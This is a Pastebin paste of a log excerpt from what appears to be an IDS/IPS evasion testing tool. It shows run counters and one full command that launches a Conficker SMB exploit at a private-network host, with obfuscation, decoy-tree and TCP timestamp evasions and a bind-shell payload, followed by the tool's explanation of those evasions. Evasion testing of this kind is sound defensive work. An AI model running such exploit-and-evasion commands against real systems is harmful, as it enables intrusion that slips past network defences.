  395. 1047 runs averaging 3.17 runs / second ; progress: 330/43200......
  396. 1053 runs averaging 3.14 runs / second ; progress: 335/43200......................
  397. 1075 runs averaging 3.16 runs / second ; progress: 340/43200......................
  398. 1097 runs averaging 3.18 runs / second ; progress: 345/43200............Pid 20186 timed out - killed
  399. 2014-10-27 15:28:15 INFO
  400. Timed out (10.62.90.82):
  401. /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.82 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=16086 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=P9jJCqtzPWA --evasion=[smb_connect,smb_opentree]smb_decoytrees,"2","7","2","zero" --evasion=[netbios_connect,end]tcp_paws,"3","3","random_alphanum" --verifydelay=1000 --payload=shell
  402. Info: Using random seed P9jJCqtzPWA
  403. The following evasions are applied from stage netbios_connect to end:
  404. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alphanumeric bytes as payload
  405. The following evasions are applied from stage smb_connect to smb_opentree:
  406. - Before normal SMB writes, 2 SMB trees are opened and 7 writes are performed to them. The write payload is 2 bytes of zeroes.
  407.  
  408. Info: NetBIOS connection 10.62.90.82:16086 -> 10.35.1.207:445
  409. Terminated
  410. .........2014-10-27 15:28:16 INFO
  411. Success. (10.62.90.79):
  412.  
  413. 18927 runs averaging 2.89 runs / second ; progress: 6539/43200.....Interrupt registered, soft shutdown
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!